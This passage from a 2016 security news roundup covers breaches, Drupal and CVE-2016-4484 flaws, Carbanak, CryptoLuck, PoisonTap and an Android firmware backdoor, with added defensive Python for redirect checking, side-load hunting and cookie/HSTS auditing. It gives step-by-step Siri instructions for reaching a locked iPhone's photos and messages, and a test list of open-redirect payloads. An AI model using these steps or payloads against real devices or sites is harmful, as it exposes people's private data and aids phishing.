Investigators believe the hackers broke into the Three Mobile database to find customers eligible for handset upgrades and then placed upgrade orders on their behalf, with the new smartphones redirected to the criminals and resold on a parallel market.

This kind of scam is on the rise: crooks order handset upgrades in the name of legitimate customers and intercept the mobile devices while they are in transit.

A Three Mobile spokesman confirmed a significant increase in attempted phone fraud over the past four weeks, adding that the increase also includes burglaries of Three retail stores.

The NCA has already arrested three men, two on computer misuse allegations and one on suspicion of attempting to pervert the course of justice.

“The investigation is ongoing and we have taken a number of steps to further strengthen our controls,” added the company spokesman.

The Three Mobile data breach follows the TalkTalk breach of October 2015, in which the details of more than 150,000 customers were stolen, including the bank account details of around 15,000.

TalkTalk suffered a significant impact: it lost 95,000 subscribers as a result of the attack, which cost it £60 million.

Drupal releases security updates to fix four vulnerabilities in versions 7, 8
18.11.2016 securityaffairs Vulnerability

Drupal developers have released updates for versions 7 and 8 that fix security issues which could expose websites to cyber attacks.
The Drupal development team has released security updates for versions 7 and 8. The updates fix security vulnerabilities that could expose websites running on the popular CMS and data they manage to security risks, including information disclosure, cache poisoning, redirection to third-party sites and a denial-of-service (DoS).

The new releases, Drupal 7.52 and Drupal 8.2.3, fix four vulnerabilities rated “moderately critical” and “less critical.”

Inconsistent name for term access query (Less critical – Drupal 7 and 8).
Incorrect cache context on password reset page (Less critical – Drupal 8).
Confirmation forms allow external URLs to be injected (Moderately critical – Drupal 7).
Denial of service via transliterate mechanism (Moderately critical – Drupal 8).
In one attack scenario, an attacker could cause a DoS condition simply by sending specially crafted URLs through the transliteration mechanism, which is used to replace certain characters, such as those used in Russian and Greek, with universally displayable US-ASCII characters.

“A specially crafted URL can cause a denial of service via the transliterate mechanism.” reads the security advisory.

In the case of the second flaw rated “Moderately critical”, under certain circumstances an attacker could craft a URL to a confirmation form that redirects users to a third-party website after they interact with the form. In this way, users could be exposed to a wide range of social engineering attacks.
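The check a confirmation form needs before honouring a redirect target, as an added illustration: accept only a path on the site itself and fall back to a safe page for anything that resolves to another host. Drupal is written in PHP and this is not Drupal’s patch; it is example code for this article in Python, and the set of accepted forms (an absolute local path with optional query and fragment) and the rejected cases (absolute URLs, protocol-relative `//host`, `javascript:` and backslash variants browsers normalise to slashes) are the author’s assumptions about what a same-site redirect should look like.

```python
"""Added example: validating a redirect target so a confirmation form cannot
be abused as an open redirect. Example code for this article, not Drupal's
own fix; accepted/rejected forms are the author's assumptions."""
from urllib.parse import urlsplit


def is_local_redirect(target: str) -> bool:
    """True only for an absolute same-site path such as '/node/1?x=y#top'."""
    if not target:
        return False
    # Browsers treat backslashes as forward slashes, so '/\\evil.example'
    # is effectively '//evil.example'. Normalise before inspecting.
    t = target.replace("\\", "/")
    # Control characters and spaces can smuggle a scheme past naive parsers.
    if any(ord(c) < 0x20 or c == " " for c in t):
        return False
    parts = urlsplit(t)
    # Any scheme ('http:', 'javascript:') or authority ('//evil.example') is external.
    if parts.scheme or parts.netloc:
        return False
    # Must start with exactly one slash: relative paths are ambiguous and
    # '//...' (even when urlsplit yields no netloc, e.g. '///host') is protocol-relative.
    if not t.startswith("/") or t.startswith("//"):
        return False
    return True


def safe_destination(target: str, fallback: str = "/") -> str:
    """The page the form should send the user to: the target if local, else the fallback."""
    return target if is_local_redirect(target) else fallback


if __name__ == "__main__":
    for candidate in ["/user/login?x=1#top", "//evil.example/phish",
                      "http://evil.example/", "javascript:alert(1)",
                      "/\\evil.example", "///evil.example"]:
        print(f"{candidate!r:32} -> {safe_destination(candidate)}")
```

An allow-list of local paths is safer than any deny-list of bad prefixes; the normalisation step matters because the browser, not the server, decides how `\` and `//` are interpreted.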


A “Less critical” flaw resides in the user password reset form, which does not specify a proper cache context, a circumstance that can lead to cache poisoning and unwanted content on the page.

The last “less critical” issue, which affects both Drupal 7 and 8, is related to inconsistent names for term access queries. The flaw can lead to information on taxonomy terms being disclosed to unprivileged users.

It is very important for websites running on Drupal to apply the security updates to avoid being hacked. In June 2016, experts from the Sucuri firm reported that, more than 19 months after the public disclosure of CVE-2014-3704, the flaw dubbed Drupalgeddon, many websites were still exposed to cyber attacks leveraging it.

How to Bypass iPhone Passcode and access personal data on the device
18.11.2016 securityaffairs iOS

A new flaw allows to bypass the iPhone Passcode protection, even when Touch ID is properly configured, and access photos and messages stored on the device.
Using a passcode to protect the data on an iPhone does not prevent someone with physical access to the device from reaching that data.

A new flaw allows to bypass the passcode protection, even when Touch ID is properly configured, and access photos and messages stored on the device.

The vulnerability affects iOS 8 and newer versions of Apple’s OS, including 10.2 beta 3. An attacker can bypass the iPhone passcode and gain access to personal data on the device by abusing Siri, Apple’s personal assistant.

The security issue was discovered by EverythingApplePro and iDeviceHelps, who disclosed it publicly and published a video PoC of the hack.

The attacker needs the phone number of the target iPhone and physical access to the phone for a few minutes. If he doesn’t know the number, Siri will reveal it in response to the simple query “Who am I?”

Once the attacker has the device’s number, these simple steps bypass the iPhone passcode protection and expose personal data on the smartphone, including messages and photos.
Call the target’s phone number; a FaceTime call works as well.
The target iPhone’s screen will show a message icon: tap the ‘Message’ icon and then ‘Custom Message’ to reach the New Message screen, where a reply can be typed.
Activate Siri by long-pressing the Home button and say “Turn on VoiceOver”; Siri will do it.
Go back to the message screen, double-tap the bar where the caller’s name is entered and hold, while immediately tapping on the keyboard. This may not produce the expected effect the first time, so repeat the action until a slide-in effect appears on the iPhone’s screen above the keyboard.
Ask Siri to “Turn off VoiceOver”, return to Messages and type the first letter of a caller’s name in the top bar, tap the ⓘ icon next to it, and then add a new contact.
Select ‘add photo’ and choose a photo: this gives access to the entire photo gallery even though the device is locked.
Select any contact on the iPhone to see all previous conversations between the target and that specific contact.

Until a fix is available, users can protect their devices by disabling Siri on the lock screen, so that the personal assistant is accessible only after providing the iPhone passcode or the fingerprint.

Go to the Settings → Touch ID & Passcode and Disable Siri on the Lockscreen by toggling the switch to disable.

Another possibility consists in removing Photos access from Siri in this way:

Go to Settings → Privacy → Photos and then prevent Siri from accessing pictures.

Experts believe Apple will fix the issue in iOS 10.2.

The Carbanak gang is now targeting the hospitality industry
18.11.2016 securityaffairs Virus

The notorious Carbanak cybercrime gang is now changing strategy and it is targeting the hospitality and restaurant industries.
The notorious Carbanak cybercrime gang that allegedly stole $1 billion from financial institutions worldwide is now changing strategy and target and it is targeting the hospitality and restaurant industries.

“In the last month Trustwave was engaged by two separate hospitality clients, and one restaurant chain for investigations by an unknown attacker or attackers. The modus operandi for all three investigations were very similar and appear to be a new Carbanak gang attack methodology, focused on the hospitality industry. ” reported Trustwave.

According to security experts at Trustwave, the Carbanak gang has recently started adopting new techniques and malware. The hackers launched a spear-phishing campaign against people in the industry in an attempt to trick victims into opening emails carrying malicious macro-laced documents.

In the attacks observed by the security firm, the attacker called the company’s customer contact line claiming to have problems using its online services and asked to send their information to the agent via email. The attacker stayed on the line until the agent opened the attachment contained in the email, then hung up once the malicious document had been opened.

“The email attachment was a malicious Word Document that contained an encoded .VBS script capable of stealing system information, desktop screenshots, and to download additional malware.”reads the analysis of the Carbanak attack. “The malicious VB Script will use macros to search for instances of Microsoft Word running on the system, if found, it will clear the existing text and replace it with the following text.”


The hackers first download a piece of malware used as a reconnaissance tool in the first stage of the attack; it is able to download popular hacking tools, including Nmap, FreeRDP, NCat and NPing.

Later it also downloads additional payloads that allow to carry on the next stage of the attack.

The final goal is to steal sensitive information and credit card data scraped from the memory of infected machines, including point-of-sale systems, using a recompiled version of the Carbanak malware that is hard to detect.

“This malware may steal credit card data, as well as screen captures, keylogger information, email addresses from the PST file, enable RDP or VNC sessions, or to obtain additional system information.”

This malware establishes a backdoor on the victim’s machine in order to gain full control of it. It communicates via an encrypted tunnel on port 443 with the following IP addresses:
All exfiltrated information is encrypted with base64+RC2 and sent via HTTP POST messages.

The new campaign started about six weeks ago, Trustwave also published a list of fresh IoCs (indicators of compromise) that could help administrators and security experts to detect the threat.

“the persistence, professionalism, and pervasiveness of this campaign is at a level rarely seen by Trustwave. The malware used is very multifaceted and still not caught by most (if any) antivirus engines. The social engineering is highly targeted, conducted via direct phone calls by threat actors with excellent English skills. The network reconnaissance and lateral movement is rapid and highly effective. Finally, the data exfiltration methodology is stealthy and efficient.” reads the conclusion of the Trustwave report.

The fact that a criminal gang like Carbanak is changing tactics to target the hospitality industry is a clear indicator of how profitable that industry is for crooks.

It’s not the first time that criminal organizations have targeted the hospitality sector.

In November 2014 Kaspersky spotted the activity of a group of cyber criminals dubbed Darkhotel that was targeting executives traveling across Asia through hotel internet networks.

The DarkHotel campaign had been ongoing for at least four years, targeting selected corporate executives traveling abroad. According to the experts, the threat actors aimed to steal sensitive data from the victims while they were staying in luxury hotels.
The attackers appeared to be highly skilled professionals who exfiltrated data of interest with surgical precision and deleted any trace of their activity.

CryptoLuck Ransomware spread through the RIG-E Exploit Kit
18.11.2016 securityaffairs Virus

CryptoLuck ransomware is a new strain of malware, discovered by the researcher Kafeine, that is being distributed via the RIG-E exploit kit.
The notorious researcher Kafeine has spotted a new strain of ransomware dubbed CryptoLuck. The malware leverages DLL hijacking, abusing the legitimate GoogleUpdate.exe executable to infect computers.

The ransomware appends the .[victim_id]_luck extension to the encrypted files and targets hundreds of file extensions. It skips files whose paths contain specific strings: Windows, Program Files, Program Files (x86), ProgramData, AppData, Application Data, Temporary Internet Files, Temp, Games, nvidia, intel, $Recycle.Bin, and Cookies.

The malware asks victims to pay a 2.1 Bitcoin (around $1,500) ransom within 72 hours in order to rescue the encrypted files.

The CryptoLuck ransomware is delivered through the RIG-Empire (RIG-E) exploit kit. Crooks currently leverage malvertising campaigns on adult websites, but they will likely adopt other infection vectors.

The ransomware is spread using a RAR SFX file that contains the crp.cfg, GoogleUpdate.exe, and goopdate.dll files, along with instructions to extract them into the %AppData%\76ff folder and to silently execute GoogleUpdate.exe.

The advantage of abusing GoogleUpdate.exe is that it is a legitimate Google program, signed by Google.

The authors of the CryptoLuck ransomware have included a malicious goopdate.dll file in the package for the legitimate program to load into memory.

“When the GoogleUpdate.exe program is run, it will look for a DLL file called goopdate.dll and load it. The problem is that it will first look for this file in the same folder that the GoogleUpdate.exe resides in. This allows a malware developer to create their own malicious goopdate.dll file and have it loaded by GoogleUpdate.” reads the analysis published by Lawrence Abrams from the
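The search-order behaviour described above leaves a simple defensive signal: a signed vendor executable that has been dropped into a user-writable profile folder, with a DLL sitting next to it. The Python below is an added example, not code from the article or from BleepingComputer; it hunts for that pattern in a list of file paths such as an inventory or file-creation log would provide. The listing, the user name alice and the legitimate Google Update paths are constructed for the example; only the %AppData%\76ff folder and the GoogleUpdate.exe/goopdate.dll names come from the article.

```python
from pathlib import PureWindowsPath
from typing import Dict, Iterable, List, Tuple

# Lower-cased path components that mark directories any unprivileged user
# can write to. A legitimately installed program lives under Program Files,
# so an .exe found under these markers is suspicious on its own; one that
# has a DLL beside it matches the CryptoLuck side-loading pattern.
USER_WRITABLE_MARKERS = ("appdata", "temp", "downloads")

# Constructed sample listing (not a real capture): the CryptoLuck drop folder
# from the article, a genuine Google Update install, and an unrelated file.
SAMPLE_PATHS = [
    r"C:\Users\alice\AppData\Roaming\76ff\GoogleUpdate.exe",
    r"C:\Users\alice\AppData\Roaming\76ff\goopdate.dll",
    r"C:\Users\alice\AppData\Roaming\76ff\crp.cfg",
    r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe",
    r"C:\Program Files (x86)\Google\Update\1.3.33.3\goopdate.dll",
    r"C:\Users\alice\Documents\notes.txt",
]


def in_user_writable_location(directory: PureWindowsPath) -> bool:
    """True if any component of the directory is a user-writable marker."""
    return any(part.lower() in USER_WRITABLE_MARKERS for part in directory.parts)


def find_sideload_candidates(paths: Iterable[str]) -> List[Tuple[str, List[str]]]:
    """Return (executable, [dlls]) pairs for every .exe that sits in a
    user-writable directory together with at least one DLL.

    The grouping is by parent directory, which is exactly the location the
    loader consults first when an executable asks for a DLL by bare name.
    """
    by_dir: Dict[PureWindowsPath, List[PureWindowsPath]] = {}
    for raw in paths:
        p = PureWindowsPath(raw)
        by_dir.setdefault(p.parent, []).append(p)

    candidates: List[Tuple[str, List[str]]] = []
    for directory in sorted(by_dir, key=lambda d: str(d).lower()):
        if not in_user_writable_location(directory):
            continue  # installed-program locations are out of scope here
        files = by_dir[directory]
        dlls = sorted(str(f) for f in files if f.suffix.lower() == ".dll")
        if not dlls:
            continue
        for exe in files:
            if exe.suffix.lower() == ".exe":
                candidates.append((str(exe), dlls))
    return candidates


if __name__ == "__main__":
    for exe, dlls in find_sideload_candidates(SAMPLE_PATHS):
        print(f"side-load candidate: {exe}")
        for dll in dlls:
            print(f"    loads-from-same-dir: {dll}")
```

The heuristic flags the AppData copy of GoogleUpdate.exe together with its neighbouring goopdate.dll and stays silent on the copy under Program Files, so a hit is worth a second look rather than an automatic verdict: confirm that the executable is really a vendor binary and whether the DLL beside it carries the vendor's signature.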

The CryptoLuck ransomware implements mechanisms to avoid analysis by security firms: if it detects that it is running in a virtual machine, it terminates. Once executed, it scans all mounted drives and unmapped network shares for files to encrypt.

The ransomware uses AES-256 with a unique AES key for each file it encrypts. Each per-file key is encrypted with an embedded RSA public key, and the resulting encrypted AES key is stored inside the encrypted file.

When the ransomware has completed the encryption of the files, it displays a ransom note that contains the instructions for the payment of the ransom.


PoisonTap hacking tool can compromise any password-protected PC
18.11.2016 securityaffairs Exploit

Samy Kamkar has created a new hacking tool, dubbed PoisonTap, to easily hack into a password-protected computer.
PoisonTap is a new hacking tool that could be used by attackers to easily access a password-protected computer, hijack all of its Internet traffic, and install backdoors.

Who is the hacker behind this new tool?

Samy Kamkar, of course.

Samy Kamkar (@samykamkar) tweeted: “I've released PoisonTap; attacks *locked* machines, siphons cookies, exposes router & backdoors browser w/RasPi&Node” (12:58 - 16 Nov 2016, West Hollywood, CA).
Samy Kamkar (@SamyKamkar) is one of the most prolific experts who periodically presents his astonishing creations to the security community, such as MagSpoof, Combo Breaker, OpenSesame and KeySweeper.

PoisonTap is a $5 Raspberry Pi Zero running Node.js code that the expert has publicly released. Once the attacker connects the device to a Windows or Mac computer via USB, it starts loading the exploits needed to compromise the machine.

Samy Kamkar explained that the device is able to compromise machines, even if they are locked.

“[PoisonTap] produces a cascading effect by exploiting the existing trust in various mechanisms of a machine and network, including USB, DHCP, DNS, and HTTP, to produce a snowball effect of information exfiltration, network access and installation of semi-permanent backdoors,” explained Kamkar.


Once the hacking tool is recognized by the host machine (Windows or OS X), it is enumerated as a low-priority network device that emulates an Ethernet adapter over USB.

The machine sends a DHCP request to the device, which responds by claiming that the entire IPv4 address space is part of PoisonTap’s local network. In this way, the machine’s entire traffic is routed through the PoisonTap device before reaching the legitimate gateway to the Internet. With this trick, the hacking tool is able to steal HTTP cookies and sessions for the Alexa top 1 million websites from the victim’s browser.


Once the attacker has collected the cookies, he is able to take over the victim’s online accounts, bypassing two-factor authentication (2FA) as well, since a stolen session cookie represents a login that has already passed the second factor.

“As long as a browser is running on the machine and an HTTP request is made automatically – such as through an ad, AJAX request, or other dynamic web content, which happens on most sites, even when the browser is entirely in the background, PoisonTap intercepts the request and responds with attack code that’s interpreted by the browser,” Kamkar explains in the video.

The attacker could also use the device to install web-based backdoors for hundreds of thousands of domains, and establish a remote access channel to the victim’s router.

PoisonTap is also able to bypass HTTPS protection if the “secure” cookie flag and HSTS are not enabled.

The device is powerful; Kamkar explained that it can also bypass many other security mechanisms, including same-origin policy (SOP), HttpOnly cookies, X-Frame-Options HTTP response headers, DNS pinning and cross-origin resource sharing (CORS).

Once the machine is compromised and the backdoor is established, the attacker is able to control the target even after the hacking tool is unplugged.

“Whenever the websocket is open, the attacker can remotely send commands to the victim and force their browser to execute JavaScript code,” added Kamkar.

Below is the PoC video published by Kamkar.

To mitigate this kind of attack on the server side, operators can properly implement HTTPS and use HSTS to prevent downgrade attacks.

Below are the server-side security measures suggested by Samy:

Use HTTPS exclusively, at the very least for authentication and authenticated content
Honestly, you should use HTTPS exclusively and always redirect HTTP content to HTTPS, preventing a user from being tricked into providing credentials or other PII over HTTP
Ensure the Secure flag is enabled on cookies, preventing HTTPS cookies from leaking over HTTP
When loading remote JavaScript resources, use the Subresource Integrity script tag attribute
Use HSTS to prevent HTTPS downgrade attacks
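The four measures above can each be checked mechanically on a server's responses. The Python below is an added example, not Kamkar's code or part of his PoisonTap release: it audits a response against the list (HTTPS only, Secure cookie flag, HSTS) and shows the Subresource Integrity computation for a script body. The two sample responses and the script body are constructed for the example; the HttpOnly check is a standard cookie-hygiene addition that is not in Kamkar's list, and the article notes that PoisonTap can work around HttpOnly, so it does not stand in for the Secure flag.

```python
import base64
import hashlib
import hmac
from typing import Dict, List

# Constructed sample responses (not captured traffic): the weak configuration
# PoisonTap exploits, beside the hardened one the list above asks for.
WEAK_RESPONSE = {
    "scheme": "http",
    "headers": {"Set-Cookie": "session=abc123; Path=/"},
}
HARDENED_RESPONSE = {
    "scheme": "https",
    "headers": {
        "Set-Cookie": "session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax",
        "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    },
}


def cookie_flags(set_cookie: str) -> set:
    """Lower-cased attribute names of a Set-Cookie value, e.g. {'path','secure'}."""
    attrs = [p.strip() for p in set_cookie.split(";")[1:]]
    return {a.split("=", 1)[0].lower() for a in attrs if a}


def hsts_max_age(value: str) -> int:
    """max-age from a Strict-Transport-Security header, 0 when absent/invalid."""
    for directive in value.split(";"):
        name, _, val = directive.strip().partition("=")
        if name.lower() == "max-age" and val.strip().isdigit():
            return int(val)
    return 0


def audit_response(resp: Dict) -> List[str]:
    """Return one finding per server-side measure the response fails."""
    findings = []
    headers = {k.lower(): v for k, v in resp["headers"].items()}
    if resp["scheme"] != "https":
        findings.append("served over plaintext HTTP: redirect to HTTPS instead")
    cookie = headers.get("set-cookie")
    if cookie is not None:
        flags = cookie_flags(cookie)
        if "secure" not in flags:
            findings.append("cookie lacks the Secure flag: it will be sent over HTTP")
        if "httponly" not in flags:
            findings.append("cookie lacks the HttpOnly flag")
    if hsts_max_age(headers.get("strict-transport-security", "")) <= 0:
        findings.append("no HSTS max-age: an HTTPS downgrade is possible")
    return findings


def redirect_to_https(host: str, path: str) -> Dict:
    """What a plaintext HTTP listener should answer with, and nothing more."""
    return {"status": 301, "Location": f"https://{host}{path}"}


def sri_integrity(script_body: bytes, algo: str = "sha384") -> str:
    """Value for <script integrity="..."> covering exactly this script body."""
    digest = hashlib.new(algo, script_body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def sri_matches(script_body: bytes, integrity: str) -> bool:
    """Re-derive the digest and compare, as the browser does before executing."""
    algo, _, _ = integrity.partition("-")
    if algo not in ("sha256", "sha384", "sha512"):
        return False
    return hmac.compare_digest(sri_integrity(script_body, algo), integrity)


if __name__ == "__main__":
    for label, resp in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_response(resp) or ["OK"])
    print(sri_integrity(b"console.log('hello');"))  # constructed script body
```

Against PoisonTap specifically, the Secure flag and HSTS are the two that matter most: the device only sees plaintext HTTP, so a cookie that is never sent over HTTP and a browser that refuses to speak HTTP to the site at all leave it nothing to capture. Subresource Integrity closes the remaining avenue of a cached, attacker-supplied copy of a third-party script.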

OurMine hackers hacked Mark Zuckerberg’s online accounts for the second time
18.11.2016 securityaffairs Hacking

For the second time this year, the hacker group OurMine breached one of the online accounts of the Facebook CEO Mark Zuckerberg.
For the second time this year, hackers seem to have breached an account belonging to Facebook CEO Mark Zuckerberg. The notorious hacking group known as OurMine has claimed credit for hacking Zuckerberg’s online accounts.

The news was reported by Zack Whittaker from Zero Day, who was contacted by the notorious group of hackers. OurMine told Whittaker they had hacked Zuckerberg’s Pinterest account; the hackers changed the tagline and published the group’s web address. At the time I was writing, the situation had been restored to normal.

“Don’t worry, we are just testing your security.” read the defaced Pinterest account of Zuckerberg.

The group did not provide further details about the attack; they only clarified that they had not used data from leaked databases.

The group admitted having exploited a flaw in Pinterest but declined to reveal it.

“When pressed, the group said that it has “a exploit on Pinterest” but didn’t say how. The last time it said that it had exploited a platform, it turned out to be a fake.” wrote Whittaker.

The OurMine hacker group has targeted many other high-profile users; the list of victims is very long and includes names like Mark Zuckerberg, Twitter co-founder Evan Williams, David Guetta, Spotify CEO and founder Daniel Ek, former Twitter CEO Dick Costolo, Google CEO Sundar Pichai, and many others.

What is the motivation?

It seems that the OurMine group is linked to a security firm that is trying to gain notoriety through the attacks and is offering its services to the targets, who evidently need them to avoid further incidents.


One of the messages posted by the group states:

“We are just testing people security (sic), we never change their passwords, we did it because there is other hackers can hack them and change everything.”

Whittaker revealed that the hackers also emailed him Zuckerberg’s username and password for his Twitter account. The OurMine group confirmed that Zuckerberg had enabled two-factor authentication after they hacked it the first time.

The hackers disclosed more information; for example, they said the phone number associated with the account ended in “86”, while the current Twitter password was Zuckerberg’s former personal Gmail password, which had been changed six months ago.

CVE-2016-4484 Hold down the Enter key for 70 sec to gain a Linux Root shell
18.11.2016 securityaffairs Vulnerability

The CVE-2016-4484 vulnerability can be exploited to gain a Linux root shell by simply holding down the Enter key for about 70 seconds.
It could be quite easy to bypass the authentication procedure on some Linux systems just by holding down the Enter key for around 70 seconds. In this way, it is possible to open a shell with root privileges and gain complete remote control over an encrypted Linux machine. The problem is related to a security vulnerability, tracked as CVE-2016-4484, in the implementation of the Cryptsetup utility.

CVE-2016-4484 was discovered by the Spanish security researchers Hector Marco and Ismael Ripoll. The principal Linux distributions, including Debian, Ubuntu, Fedora, Red Hat Enterprise Linux (RHEL), and SUSE Linux Enterprise Server (SLES), are vulnerable. Millions of users are at risk.

“A vulnerability in Cryptsetup, concretely in the scripts that unlock the system partition when the partition is ciphered using LUKS (Linux Unified Key Setup). The disclosure of this vulnerability was presented as part of our talk “Abusing LUKS to Hack the System” in the DeepSec 2016 security conference, Vienna.” wrote the researchers in a security advisory.

“This vulnerability allows to obtain a root initramfs shell on affected systems. The vulnerability is very reliable because it does not depend on specific systems or configurations. Attackers can copy, modify or destroy the hard disc as well as set up the network to exfiltrate data. This vulnerability is especially serious in environments like libraries, ATMs, airport machines, labs, etc, where the whole boot process is protected (password in BIOS and GRUB) and we only have a keyboard or/and a mouse.”

Cryptsetup is a utility used to conveniently set up disk encryption based on the dm-crypt kernel module. Supported formats include plain dm-crypt volumes, LUKS volumes, loop-AES and TrueCrypt (including the VeraCrypt extension).

The bug affects the way the Cryptsetup boot scripts handle the decryption password prompt when a system boots up, which lets a user retry the password multiple times.

Once the user has exhausted all 93 password attempts, the system drops the user into a shell with root privileges.

Simply holding down the Enter key for roughly 70 seconds gives the user a root initial RAM file system (initramfs) shell, with full access to the local file system, which could be abused to exfiltrate data over the network. The bad news is that the flaw is also remotely exploitable; this is the case for cloud-based services running on Linux, which could be targeted without ‘physical access.’

The experts highlighted that the attacker is nevertheless not able to read the contents of the encrypted drive.

Below is the list of operations available to the attacker:

Elevation of privilege: Since the boot partition is typically not encrypted:
It can be used to store an executable file with the SetUID bit enabled, which can later be used by a local user to escalate privileges.
If the boot is not secured, then it would be possible to replace the kernel and the initrd image.
Information disclosure: It is possible to access all the disks. Although the system partition is encrypted, it can be copied to an external device, where it can later be brute forced. Obviously, it is possible to access non-encrypted information on other devices.
Denial of service: The attacker can delete the information on all the disks.
To fix the problem, check whether a patch is available for your distribution. If no patch is available, the problem can be mitigated by modifying the cryptroot script to limit the number of password attempts and to stop the boot sequence when this number is reached.


You can add the following commands to your boot configuration:

sed -i 's/GRUB_CMDLINE_LINUX_DEFAULT="/GRUB_CMDLINE_LINUX_DEFAULT="panic=5 /' /etc/default/grub
grub-install

The sed command prepends panic=5 to the kernel command line, so that when the boot scripts give up the kernel reboots after five seconds instead of leaving the machine in the initramfs shell. Note that the sed expression is not idempotent (running it twice inserts panic=5 twice), and that grub-install rewrites the bootloader but does not rebuild grub.cfg: on Debian-based systems the configuration is regenerated with update-grub (or grub-mkconfig).
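As an added example (not part of the researchers' advisory or the article), the Python below performs the same change to /etc/default/grub idempotently, preserving any existing options, and checks a kernel command line for the mitigation. The sample /etc/default/grub contents and the sample command lines are constructed; the check treats a missing parameter and panic=0 (the kernel default, meaning no automatic reboot) as unmitigated.

```python
import re
from typing import Optional

# Constructed /etc/default/grub fragment in the shape a Debian/Ubuntu install uses.
SAMPLE_GRUB_DEFAULT = """\
GRUB_DEFAULT=0
GRUB_TIMEOUT=5
GRUB_CMDLINE_LINUX_DEFAULT="quiet splash"
GRUB_CMDLINE_LINUX=""
"""

# panic=<seconds> as a whole token on the kernel command line.
_PANIC_RE = re.compile(r"(?:^|\s)panic=(\d+)(?=\s|$)")
_DEFAULT_LINE_RE = re.compile(r'^GRUB_CMDLINE_LINUX_DEFAULT="(.*)"\s*$')


def panic_timeout(cmdline: str) -> Optional[int]:
    """Return the panic= value found in a kernel command line, or None."""
    m = _PANIC_RE.search(cmdline)
    return int(m.group(1)) if m else None


def is_mitigated(cmdline: str) -> bool:
    """The workaround needs a positive panic timeout; panic=0 keeps the
    kernel's default of never rebooting, so it is not counted."""
    timeout = panic_timeout(cmdline)
    return timeout is not None and timeout > 0


def add_panic_to_grub_default(text: str, seconds: int = 5) -> str:
    """Idempotent equivalent of the sed one-liner: ensure exactly one
    panic=<seconds> token leads GRUB_CMDLINE_LINUX_DEFAULT, keeping the
    other options, and append the variable if the file lacks it."""
    out = []
    found = False
    for line in text.splitlines():
        m = _DEFAULT_LINE_RE.match(line)
        if m:
            found = True
            tokens = [t for t in m.group(1).split() if not t.startswith("panic=")]
            tokens.insert(0, f"panic={seconds}")
            line = f'GRUB_CMDLINE_LINUX_DEFAULT="{" ".join(tokens)}"'
        out.append(line)
    if not found:
        out.append(f'GRUB_CMDLINE_LINUX_DEFAULT="panic={seconds}"')
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    print(add_panic_to_grub_default(SAMPLE_GRUB_DEFAULT), end="")
    # On a live system, the running kernel's parameters are in /proc/cmdline.
    try:
        with open("/proc/cmdline") as fh:
            running = fh.read().strip()
        print("running kernel mitigated:", is_mitigated(running))
    except OSError:
        print("/proc/cmdline not readable here")
```

After rewriting /etc/default/grub, grub.cfg still has to be regenerated (update-grub on Debian-based systems) and the machine rebooted; is_mitigated() run against /proc/cmdline afterwards confirms that the parameter actually reached the kernel.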

Hacker behind Spamhaus attack will not spend any time in the jail
18.11.2016 securityaffairs Crime

The Dutch hacker Sven Olaf Kamphuis, who was charged over the massive DDoS attack against Spamhaus, will not spend any time in jail.
The Dutch hacker Sven Olaf Kamphuis, who was charged over the massive DDoS attack against the anti-spam group Spamhaus, the biggest attack ever, escaped prison on Monday.

The Spamhaus Project is an international nonprofit organization that monitors spam and related cyber threats.

It sells information on threat actors to Internet Service Providers, including blacklists of malicious websites.

ISPs use these blacklists to filter spam. Kamphuis’s provider CyberBunker was included in these lists, which means that Spamhaus blocked its customers. In revenge, Kamphuis launched the attack against Spamhaus.

Spamhaus blamed CyberBunker for the 2013 DDoS attack, which came just after it blacklisted CyberBunker.


Sven Olaf Kamphuis was arrested in April 2013 by Spanish law enforcement in Barcelona, following a European arrest warrant for the attack against Spamhaus that peaked at over 300 Gbps.

Kamphuis was sentenced to a total of 240 days in jail, but most of his term was suspended.

He served 55 days in jail while awaiting extradition from Spain to the Netherlands in 2013. The judges then suspended the remaining 185 days of the sentence.

According to the court, the DDoS attacks on Spamhaus put “the proper functioning of the Internet at risk and thus the interests of many individuals, businesses, and institutions.”

“That attack was on the network of the US Internet company Spamhaus. K. was arrested in Spain in 2013 and extradited to the Netherlands. He was detained in custody for 55 days, so he does not go back to jail.” reported the Dutch media.

Kamphuis was sentenced for taking part in a global cybercrime ring that hacked machines worldwide.

In July 2015, another hacker, the British teenager Seth Nolan Mcdonagh (aka Narko), was sentenced to 240 hours of community service for the attack.

Kamphuis’s lawyers maintained that Mcdonagh was solely responsible for the Spamhaus attack.

Kamphuis will not spend any time in jail.

Experts spotted a secret backdoor in Android phones that sends data to China
18.11.2016 securityaffairs Android

Experts at Kryptowire discovered a mobile phone firmware that transmitted personally identifiable information without user consent due to a backdoor.
Security experts from the firm Kryptowire have discovered a backdoor in the firmware installed on low-cost Android phones. The backdoor affects mobile phones from BLU Products that are sold through both Amazon and Best Buy.

The backdoor resides in the commercial Firmware Over The Air (FOTA) update software that is installed on BLU Android devices provided as a service to BLU by AdUps.

The impact is worrisome if we consider that the backdoor could be exploited by threat actors to collect personal data about the phones and their owners’ activities and send it back to servers located in China. The servers appear to be owned by a firmware update software provider, Shanghai AdUps Technologies.

“Kryptowire has identified several models of Android mobile devices that contained firmware that collected sensitive personal data about their users and transmitted this sensitive data to third-party servers without disclosure or the users’ consent. These devices were available through major US-based online retailers (Amazon, BestBuy, for example) and included popular smartphones such as the BLU R1 HD.” reads the analysis published by Kryptowire. “These devices actively transmitted user and device information including the full-body of text messages, contact lists, call history with full telephone numbers, unique device identifiers including the International Mobile Subscriber Identity (IMSI) and the International Mobile Equipment Identity (IMEI).”


Experts discovered that the data gathered by the backdoor includes phone numbers, location data, the content of text messages, calls made, and applications installed and used.

Why such a backdoor?

It seems that Shanghai AdUps Technologies inserted the backdoor in its firmware for advertising and commercial purposes; its main goal is to collect data on users’ behavior.

The company also provides firmware updates for Chinese tech giants, including Huawei and ZTE, accounting for more than 700 million devices worldwide.

A legal representative of the company told The New York Times that the company is not gathering information for the government in Beijing.

“This is a private company that made a mistake,” said Lily Lim, a lawyer who represents Adups.

“For many years, the Chinese government has used a variety of methods to filter and track internet use and monitor online conversations. It requires technology companies that operate in China to follow strict rules. Ms. Lim said Adups was not affiliated with the Chinese government.” reported the NYT.

Kryptowire, which discovered the backdoor, reported it to Google, BLU, AdUps, and Amazon.

Ransomware: How to recover your encrypted files, the last guide.
18.11.2016 securityaffairs Virus

